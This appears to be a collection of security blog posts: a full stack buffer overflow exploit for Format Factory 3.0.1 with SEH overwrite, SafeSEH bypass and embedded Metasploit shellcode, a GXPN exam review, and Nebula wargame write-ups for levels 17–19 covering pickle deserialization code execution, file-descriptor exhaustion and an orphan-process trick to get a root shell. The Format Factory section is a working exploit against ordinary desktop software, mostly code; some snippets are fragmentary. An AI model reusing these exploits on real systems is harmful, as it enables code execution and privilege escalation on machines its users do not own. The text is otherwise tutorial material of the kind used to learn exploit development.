Unfortunately we can’t see our A’s anywhere. At this point we could reverse engineer the vulnerable function and try to figure out why the crash is happening. Another way, which comes naturally when fuzzing, is to increase the length of the payload and see how that affects the crash. In our case, after increasing the payload length to 8192 A’s, the program generates an exception, and when the SEH handler is called (once we pass the exception to the program), a segmentation fault occurs while trying to execute 0x41414141.

8192 A’s shows control of EIP when SEH is invoked
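The manual length-increment approach can be scripted in a few lines. This sketch just writes one candidate profile per payload length to a temp directory; the [Profile]/Type layout here is a guess modeled on the description above, not necessarily the exact .ini format Format Factory writes:

```python
import os
import tempfile

# Hypothetical .ini layout -- modeled on the description above; the real
# file written by Format Factory may contain more keys.
TEMPLATE = "[Profile]\nType={payload}\nWidth=320\n"

def gen_cases(outdir, lengths=(128, 256, 512, 1024, 2048, 4096, 8192)):
    """Write one candidate profile per payload length and return the paths."""
    paths = []
    for n in lengths:
        path = os.path.join(outdir, "profile_%d.ini" % n)
        with open(path, "w") as f:
            f.write(TEMPLATE.format(payload="A" * n))
        paths.append(path)
    return paths

cases = gen_cases(tempfile.mkdtemp())
```

Copy each file into the PicCustom folder in turn, launch the application, and note which lengths crash it.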

Now, that’s good news. Controlling EIP through an SEH overwrite means we can try our luck with this program. Next, we’ll take a look at the output of the «!mona modules» command within Immunity Debugger to see what modules are loaded and what protections we’re facing. On my system, the output is shown below:

Output of !mona modules

A quick glance shows that ASLR is disabled, as is NX. However, all modules have been compiled with the /SAFESEH flag, which means we’ll have to bypass that inconvenience while developing our exploit. SafeSEH is an exploit mitigation that checks the address of the SEH handler to be executed against a list of handlers generated at compile time. If the address of the handler doesn’t belong to the list, the program is terminated. Nonetheless, SafeSEH doesn’t kick in for some types of addresses (e.g. the heap, or addresses not belonging to loaded modules). We’ll use that flaw to build a successful attack.

First things first, we need to figure out the exact position in our payload that’s effectively overwriting EIP. For that, we’ll take advantage of another of mona’s invaluable commands:

!mona pc 8192

That command, based on Metasploit’s pattern_create, generates a cyclic pattern of the specified length. We’ll copy that pattern into the .ini file. A portion of that pattern will be held in EIP at the time of the crash. In our case, EIP holds the value 0x41386941. With the aid of another command, we find the position at which we gain control over EIP.

Pattern found at position 264
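The pattern machinery is easy to re-derive. A self-contained reimplementation of the Metasploit-style cyclic pattern reproduces the same offset from the EIP value we saw:

```python
import string
import struct

def pattern_create(length):
    """Metasploit-style cyclic pattern: Aa0Aa1...Aa9Ab0... and so on."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]

def pattern_offset(eip_value, length=8192):
    """Locate the little-endian bytes of EIP inside the pattern."""
    needle = struct.pack("<I", eip_value).decode("ascii")
    return pattern_create(length).find(needle)

pattern_offset(0x41386941)  # → 264
```

0x41386941 stored little-endian is the ASCII "Ai8A", which first occurs 264 bytes into the pattern, matching mona’s result.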

We have enough information to start putting together a simple Python exploit for this vulnerability. Since we don’t seem to have any room problems accommodating our shellcode, we’ll use a simple Metasploit-generated one which launches the infamous Windows calculator. To generate such a creative shellcode, we use Metasploit’s msfpayload, making sure we exclude the following bad chars: 0x00, 0x0a, 0x0d (null byte and line terminators).

Shellcode obtained through msfpayload
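Before dropping the encoded shellcode into the exploit, it’s cheap to double-check that none of the excluded bad chars slipped through (only the first few bytes of the payload are shown here):

```python
BADCHARS = b"\x00\x0a\x0d"  # null byte and line terminators

def find_badchars(shellcode: bytes):
    """Return the bad-char values present in the shellcode, if any."""
    return sorted({b for b in shellcode if b in BADCHARS})

# first bytes of the msfencode output shown above
sc = b"\xb8\xdf\x03\x36\x32\xda\xc8\xd9\x74\x24\xf4\x5f\x2b\xc9"
find_badchars(sc)  # → []
```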

We can use that output directly in our exploit code. We still need to find a suitable address containing the desired «pop/pop/ret» sequence (or something equivalent), a classic when it comes to SEH exploitation. To find that address we’ll use mona one more time. Since all modules have been compiled with the /SAFESEH flag, running «!mona seh» won’t find any suitable address. However, the optional «-all» argument instructs mona to search for pointers outside loaded modules, which is an elegant way to bypass SafeSEH. Below is mona’s output:

!mona seh -all

Pointers found outside loaded modules with !mona seh -all

OK, now we have all the information we need to build a successful exploit. The following Python script is a final version of such an exploit. It creates a .ini file containing the payload within one of Format Factory’s profile folders.

# Format Factory v3.0.1 stack buffer overflow exploit.
# Windows XP Pro SP3. Spanish
# Author: Adrian Bravo 24/11/2012

import struct

# msfpayload windows/exec CMD=calc.exe R | msfencode -b "\x0a\x0d\x00"
sc= ("\xb8\xdf\x03\x36\x32\xda\xc8\xd9\x74\x24\xf4\x5f\x2b\xc9" +
"\xb1\x33\x31\x47\x12\x03\x47\x12\x83\x18\x07\xd4\xc7\x5a" +
"\xe0\x91\x28\xa2\xf1\xc1\xa1\x47\xc0\xd3\xd6\x0c\x71\xe4" +
"\x9d\x40\x7a\x8f\xf0\x70\x09\xfd\xdc\x77\xba\x48\x3b\xb6" +
"\x3b\x7d\x83\x14\xff\x1f\x7f\x66\x2c\xc0\xbe\xa9\x21\x01" +
"\x86\xd7\xca\x53\x5f\x9c\x79\x44\xd4\xe0\x41\x65\x3a\x6f" +
"\xf9\x1d\x3f\xaf\x8e\x97\x3e\xff\x3f\xa3\x09\xe7\x34\xeb" +
"\xa9\x16\x98\xef\x96\x51\x95\xc4\x6d\x60\x7f\x15\x8d\x53" +
"\xbf\xfa\xb0\x5c\x32\x02\xf4\x5a\xad\x71\x0e\x99\x50\x82" +
"\xd5\xe0\x8e\x07\xc8\x42\x44\xbf\x28\x73\x89\x26\xba\x7f" +
"\x66\x2c\xe4\x63\x79\xe1\x9e\x9f\xf2\x04\x71\x16\x40\x23" +
"\x55\x73\x12\x4a\xcc\xd9\xf5\x73\x0e\x85\xaa\xd1\x44\x27" +
"\xbe\x60\x07\x2d\x41\xe0\x3d\x08\x41\xfa\x3d\x3a\x2a\xcb" +
"\xb6\xd5\x2d\xd4\x1c\x92\xc2\x9e\x3d\xb2\x4a\x47\xd4\x87" +
"\x16\x78\x02\xcb\x2e\xfb\xa7\xb3\xd4\xe3\xcd\xb6\x91\xa3" +
"\x3e\xca\x8a\x41\x41\x79\xaa\x43\x22\x1c\x38\x0f\x8b\xbb")
# (shellcode truncated here in the original post)

path = r"C:\Documents and Settings\adrian\Mis documentos\FormatFactory\PicCustom\profileExploit.ini"
buf = "A"*260 # Initial padding
buf += "\xeb\x06\x90\x90" # nseh: Jump over seh (6 bytes)
buf += struct.pack('<L',0x7ffc03ef) # SafeSEH bypass 0x7ffc03ef : pop ebx # pop eax # ret  |  {PAGE_READONLY} [None]
buf += sc
buf += "A"*(8192-264-8-len(sc))
file = open(path,"w")
file.write(buf)
file.close()

The above payload follows the classic structure of an SEH exploit, which I’ll explain briefly. First we add padding to reach the position of the next-SEH pointer, i.e. the overwrite position minus 4 bytes. There we place a short jmp (\xeb\x06) that hops 6 bytes forward, over the SEH pointer that follows, landing right in our shellcode. As that instruction is only two bytes long, we add a couple of nops (0x90), hence the need to jump over 6 bytes instead of 4 (2 nops + 4 bytes of the SEH pointer). Next comes the address of the «pop/pop/ret» sequence, with the shellcode immediately after. The last part of the script simply creates the file and writes the payload to it.
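As a quick sanity check, the layout can be verified offline with a nop placeholder standing in for the real shellcode:

```python
import struct

sc = b"\x90" * 227                      # placeholder for the real shellcode
buf  = b"A" * 260                       # padding up to the next-SEH field
buf += b"\xeb\x06\x90\x90"              # nSEH: short jmp over the SEH pointer
buf += struct.pack("<L", 0x7ffc03ef)    # SEH: pop/pop/ret outside any module
buf += sc
buf += b"A" * (8192 - len(buf))         # filler up to the crash length

assert buf[260:262] == b"\xeb\x06"                         # jmp at next-SEH
assert struct.unpack("<L", buf[264:268])[0] == 0x7ffc03ef  # handler address
assert len(buf) == 8192
```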

I’m calling it a day now. If you have any questions, please feel free to ask in the comments. Take care!

Posted in exploiting, seguridad, Windows

Achievement Unlocked: SANS GIAC GXPN

Last Friday I went over to Dublin to sit the exam for the GIAC GXPN certification: Exploit Researcher and Advanced Penetration Tester. The exam went more than well (90.67%), so I’m very happy. Unlike the previous center, this time the venue was much better. It’s also true that this is the first SANS certification I’ve obtained since they switched to the VUPEN centers. It must be said, though, that even though I’ve read complaints from some colleagues about these centers (true horror stories in some cases), I had no problem at all, neither with the books (the exam is open book), nor with my notes, nor anything. Well, an alarm did go off during the exam, but the person in charge came into the room to tell us it was a false alarm and that we could continue.

The course content, which this time I took On Demand, is adequate, although I don’t think they should have reworked SEC709 into SEC660 and SEC710. I suppose they did it because a course solely about exploits wouldn’t attract as many people (it would attract me), but by splitting it in two and including more pentesting content in this first course, the combination feels a bit odd. The Python section is fine, especially if you have no idea of Python. For those with some experience with the language, it’s a superfluous section. I did quite like the cryptography-for-pentesters section; I think it’s useful and tackles topics that often go unreviewed during penetration tests. The network pentesting part falls a bit short in my view, and the exploit part doesn’t go in depth into most topics; I imagine that’s what they moved to SEC710. Nevertheless, I learned a lot taking the course, had a good time, and improved in many ways, and that’s what matters.

The exam is slightly shorter than the GPEN (3 hours instead of 4) and has half the questions (75). Even though I think the SEC660 content is more complex, the exam felt easier to me (although I scored lower than on the GPEN). As with the GPEN, you usually have time to spare (an hour and a half in this case), since if there’s something you don’t know, it’s unlikely you’ll find it by searching the books, as most questions aren’t of that kind.

In conclusion, another positive experience with SANS.

Posted in General, seguridad

Nebula Level 18 Solution

As the instructions for this level tell us, there are three ways to solve it: easy, medium, and hard. I’ll go over what they are and how to solve it through one of them.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <getopt.h>
#include <err.h>

struct {
FILE *debugfile;
int verbose;
int loggedin;
} globals;

#define dprintf(...) if(globals.debugfile) fprintf(globals.debugfile, __VA_ARGS__)
#define dvprintf(num, ...) if(globals.debugfile && globals.verbose >= num) fprintf(globals.debugfile, __VA_ARGS__)

#define PWFILE "/home/flag18/password"

void login(char *pw)
{
    FILE *fp;

    fp = fopen(PWFILE, "r");
    if(fp) {
        char file[64];

        if(fgets(file, sizeof(file) - 1, fp) == NULL) {
            dprintf("Unable to read password file %s\n", PWFILE);
            return;
        }
        fclose(fp);
        if(strcmp(pw, file) != 0) return;
    }
    dprintf("logged in successfully (with%s password file)\n",
        fp == NULL ? "out" : "");

    globals.loggedin = 1;
}

void notsupported(char *what)
{
    char *buffer = NULL;
    asprintf(&buffer, "--> [%s] is unsupported at this current time.\n", what);
    dprintf(buffer);
}

void setuser(char *user)
{
    char msg[128];

    sprintf(msg, "unable to set user to '%s' -- not supported.\n", user);
    printf("%s\n", msg);
}

int main(int argc, char **argv, char **envp)
{
    char c;

    while((c = getopt(argc, argv, "d:v")) != -1) {
        switch(c) {
            case 'd':
                globals.debugfile = fopen(optarg, "w+");
                if(globals.debugfile == NULL) err(1, "Unable to open %s", optarg);
                setvbuf(globals.debugfile, NULL, _IONBF, 0);
                break;
            case 'v':
                globals.verbose++;
                break;
        }
    }

    dprintf("Starting up. Verbose level = %d\n", globals.verbose);

    setresgid(getegid(), getegid(), getegid());
    setresuid(geteuid(), geteuid(), geteuid());

    while(1) {
        char line[256];
        char *p, *q;

        q = fgets(line, sizeof(line)-1, stdin);
        if(q == NULL) break;
        p = strchr(line, '\n'); if(p) *p = 0;
        p = strchr(line, '\r'); if(p) *p = 0;

        dvprintf(2, "got [%s] as input\n", line);

        if(strncmp(line, "login", 5) == 0) {
            dvprintf(3, "attempting to login\n");
            login(line + 6);
        } else if(strncmp(line, "logout", 6) == 0) {
            globals.loggedin = 0;
        } else if(strncmp(line, "shell", 5) == 0) {
            dvprintf(3, "attempting to start shell\n");
            if(globals.loggedin) {
                execve("/bin/sh", argv, envp);
                err(1, "unable to execve");
            }
            dprintf("Permission denied\n");
        } else if(strncmp(line, "logout", 4) == 0) {
            globals.loggedin = 0;
        } else if(strncmp(line, "closelog", 8) == 0) {
            if(globals.debugfile) fclose(globals.debugfile);
            globals.debugfile = NULL;
        } else if(strncmp(line, "site exec", 9) == 0) {
            notsupported(line + 10);
        } else if(strncmp(line, "setuser", 7) == 0) {
            setuser(line + 8);
        }
    }
    return 0;
}


If you look carefully, you’ll see there’s a buffer overflow in the setuser() function, in the msg buffer. It would be possible to solve the challenge through this vulnerability, although I personally ruled it out. The complication is that the system has ASLR enabled, and the binary was compiled with SSP and NX. Bypassing those protections and developing a working exploit, while possible, is somewhat out of place when there are two other easy ways to do it.

SSP detects the BoF


There is a «format string» vulnerability in the notsupported() function. The most obvious route from here would be to try to overwrite the globals.loggedin variable so that the shell can be invoked without problems. However, the program was compiled with FORTIFY_SOURCE, and although we can read memory positions with this vulnerability, when we try to overwrite memory, execution is aborted.

FORTIFY_SOURCE stops the format string

The address used belongs to .bss and was computed beforehand to point at globals.loggedin. Trying to overwrite .dtors produces the same effect. In fact, any overwrite will produce either a segmentation fault or the message seen in the screenshot. Another possibility would be to read the password from memory, since it will be on the stack while login() runs. However, I don’t think the password is reachable from notsupported() after login() has executed. Any other ideas will be interesting to read in the comments.


The easy way to exploit the vulnerability once again lies in knowing a bit about how Linux works, in this case, knowing about process limits. Look closely at the login() function, at the logical flow:

FILE *fp;
fp = fopen(PWFILE, "r");
if(fp) {
    /* ...reads and compares the password, returning on mismatch... */
}
/* reached directly when fopen() fails */
globals.loggedin = 1;

It opens PWFILE; if it opens it successfully, it does things with it. If not, the «if» ends and you are granted access to the application. It’s a clear example of «fail open». The obvious question is: how do we make the file open fail? We have no access to the file itself, so we can’t change its permissions or delete it to make the program fail. However, you’ve surely noticed something else, something missing. The login() function opens the file, but never closes it. This becomes relevant once you add the fact that a process has a maximum number of file descriptors assigned. Once it exhausts them all, fopen() will fail.
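The descriptor-exhaustion effect is easy to reproduce from Python. In this sketch the soft limit is lowered with setrlimit so the experiment stays fast (on the Nebula VM the default is 1024, as shown below):

```python
import resource

soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
target = 256 if hard == resource.RLIM_INFINITY else min(256, hard)
resource.setrlimit(resource.RLIMIT_NOFILE, (target, hard))  # shrink the limit

leaked = []
error = None
try:
    while True:
        leaked.append(open("/dev/null"))  # open and never close, like login()
except OSError as exc:
    error = exc                           # "Too many open files"

# clean up so the rest of the interpreter keeps working
for f in leaked:
    f.close()
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
```

Once every slot is taken, each further open() (and therefore fopen() in the target) fails with EMFILE.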

1024 descriptors available

So the trick will be to invoke the login() function 1024 times, after which login will fail. Once it fails, it will set globals.loggedin to 1, and we’ll be able to invoke the shell. Let’s see what happens.

Login+shell doesn’t work

Something went wrong. To be precise, our idea has a problem: when the shell is about to run, there are no free descriptors left for execve() to use while creating the process. Luckily for us, we have the closelog command at our disposal, which, as you can see, closes the log, freeing up a file descriptor that comes in very handy.

} else if(strncmp(line, "closelog", 8) == 0) {
if(globals.debugfile) fclose(globals.debugfile);
globals.debugfile = NULL;

So next we’ll call login() 1021 times, then closelog once, and then shell.
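Building that input is a one-liner, the Python equivalent of the perl command used in the session transcript:

```python
# 1021 logins exhaust the descriptors, closelog frees one, shell uses it
payload = "login\n" * 1021 + "closelog\n" + "shell\n"

# feed it to the target, e.g.:
#   printf '%s' "$payload" | /home/flag18/flag18 -d /tmp/debug.txt -vvv
```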

Something isn’t quite working yet, but we did invoke the shell

The problem is that the shell is invoked with the arguments the flag18 program received, and it doesn’t know how to interpret the «-d» flag. There’s a bash feature we can use to get past this obstacle: the «--init-file» flag. This flag makes bash execute the contents of the specified file. Although I’ve tried several approaches, it seems all I manage is to get the program’s own log executed. Since the program’s log contains no recognized commands, the output is a bunch of lines saying it can’t find this or that command.

level18@nebula:~$ perl -e 'print "login\n"x1021 . "closelog\n" . "shell\n"' | /home/flag18/flag18 --init-file /tmp/file -d /tmp/debug2.txt -vvv
/home/flag18/flag18: invalid option -- '-'
/home/flag18/flag18: invalid option -- 'i'
/home/flag18/flag18: invalid option -- 'n'
/home/flag18/flag18: invalid option -- 'i'
/home/flag18/flag18: invalid option -- 't'
/home/flag18/flag18: invalid option -- '-'
/home/flag18/flag18: invalid option -- 'f'
/home/flag18/flag18: invalid option -- 'i'
/home/flag18/flag18: invalid option -- 'l'
/home/flag18/flag18: invalid option -- 'e'
/tmp/debug2.txt: line 1: Starting: command not found
/tmp/debug2.txt: line 2: got: command not found
/tmp/debug2.txt: line 3: attempting: command not found
/tmp/debug2.txt: line 4: got: command not found
/tmp/debug2.txt: line 5: attempting: command not found
/tmp/debug2.txt: line 6: got: command not found
/tmp/debug2.txt: line 7: attempting: command not found
/tmp/debug2.txt: line 8: got: command not found

The final solution is to create a command named «Starting» or «got» so the shell can find it, and have that command run our instructions. To do that, we’ll create a bash script called «Starting», place it in our current directory, and add the current directory to the PATH so bash finds it.

We create «Starting» in the current directory

And sure enough, in /tmp/flag18 we have this level’s flag.

level18@nebula:~$ cat /tmp/flag18
You have successfully executed getflag on a target account

With this we’ve covered all the Nebula levels. Any questions, in the comments.


Posted in exploiting, hacking

Nebula Levels 17 and 19 Solutions

Level 17:

We have a small Python program that accepts input and processes it.


import os
import pickle
import time
import socket
import signal

signal.signal(signal.SIGCHLD, signal.SIG_IGN)

def server(skt):
    line = skt.recv(1024)

    obj = pickle.loads(line)

    for i in obj:
        clnt.send("why did you send me " + i + "?\n")

skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
skt.bind(('', 10007))
skt.listen(10)

while True:
    clnt, addr = skt.accept()

    if(os.fork() == 0):
        clnt.send("Accepted connection from %s:%d" % (addr[0], addr[1]))
        server(clnt)
        exit(1)

I have to admit that at first I had no idea where to start with this program, so I went off to read the documentation of some of the Python functions it uses. In the end, it turned out that the pickle module is not safe, and that arbitrary code execution can occur during the «unpickling» process.

I wrote myself a small Python script that let me see what output was generated when pickling certain objects (strings, functions, nested functions…) so I could build a call that would trigger the aforementioned security problem:

import time
import os
import pickle

f = open("/dev/stdout","w")

With this, and a bit more digging into pickle’s REDUCE opcode, I arrived at the following:

level17@nebula:~$ cat /tmp/send
(S'getflag > /tmp/flag17'
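The handwritten opcodes above drive pickle’s REDUCE mechanism directly. The same effect can be shown from Python itself via __reduce__, here with a harmless call standing in for the getflag command used against the level:

```python
import os
import pickle

class Evil(object):
    def __reduce__(self):
        # Tells pickle "rebuild me by calling os.getcwd()" -- a harmless
        # stand-in for os.system('getflag > /tmp/flag17') in the real attack.
        return (os.getcwd, ())

payload = pickle.dumps(Evil())
result = pickle.loads(payload)   # the call runs during unpickling
result == os.getcwd()  # → True
```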

Now all that’s left is to send it to the service listening on port 10007, with netcat for example, since it’s installed on the VM.

Send and win

Level 19:

The following program executes a shell if «root has executed it»:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <err.h>

int main(int argc, char **argv, char **envp)
{
    pid_t pid;
    char buf[256];
    struct stat statbuf;

    /* Get the parent's /proc entry, so we can verify its user id */

    snprintf(buf, sizeof(buf)-1, "/proc/%d", getppid());

    /* stat() it */

    if(stat(buf, &statbuf) == -1) {
        printf("Unable to check parent process\n");
        exit(EXIT_FAILURE);
    }

    /* check the owner id */

    if(statbuf.st_uid == 0) {
        /* If root started us, it is ok to start the shell */

        execve("/bin/sh", argv, envp);
        err(1, "Unable to execve");
    }

    printf("You are unauthorized to run this program\n");
    return 0;
}

The problem is that the «did root execute us» check is rather poorly done, since what it is really checking is whether its parent process is running as root. In essence, this means that if we get this program’s parent to be any process running as root, we’ll get a root shell. Which is not too hard to achieve if we know how processes work in Linux.

If a process with children dies before they finish, it leaves those child processes «orphaned», which is a problem, since they have no one to report their exit status to, nor the signals they don’t catch, among other things. For this, Linux has the init process. Init always runs at system startup, as the system’s first process, with process number 1. In addition, it takes care of «adopting», thus becoming the parent of, every orphaned process on the system. Oh, and init runs as root 😉
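The adoption behavior can be checked with a small experiment: fork twice, let the middle process die, and ask the orphaned grandchild who its new parent is (on a plain system it will be pid 1; with subreapers in play it may be another pid, but never the dead middle process):

```python
import os
import time

def orphan_parent():
    """Return (middle_pid, ppid observed by the orphan after middle dies)."""
    r, w = os.pipe()
    middle = os.fork()
    if middle == 0:                      # middle process
        if os.fork() == 0:               # grandchild
            os.close(r)
            time.sleep(0.5)              # give the middle process time to die
            os.write(w, str(os.getppid()).encode())
            os._exit(0)
        os._exit(0)                      # middle dies -> grandchild orphaned
    os.close(w)
    os.waitpid(middle, 0)                # reap the middle process
    data = os.read(r, 32)                # blocks until the orphan reports in
    os.close(r)
    return middle, int(data)

middle, adopted = orphan_parent()
# adopted is no longer `middle`; on a plain system it is 1 (init)
```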

Therefore, if we run the victim program and then die, the program will be inherited by init and we’ll be able to get the shell. Well, we’ll be able to run commands in that root shell; actually grabbing it will be difficult, since we’ll have lost control of the child once we die. The following C program does exactly this:

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>

int main(void){
    pid_t pid;
    char* args[] = {"/bin/sh", "-c", "getflag > /tmp/flag19", NULL};

    pid = fork();
    if (pid == 0){
        // child: execute the target program
        execve("/home/flag19/flag19", args, NULL);
    } else if (pid < 0){
        // fork failed
        return -1;
    }
    // parent: must die so that init adopts the child
    return 0;
}
As you can see, flag19 is executed with arguments that it will then pass on to the shell through the execve call.

Exploiting parent-child problems

That leaves only level 18, to which I’ve decided to devote a separate entry so as not to drag this one out.


Posted in exploiting, hacking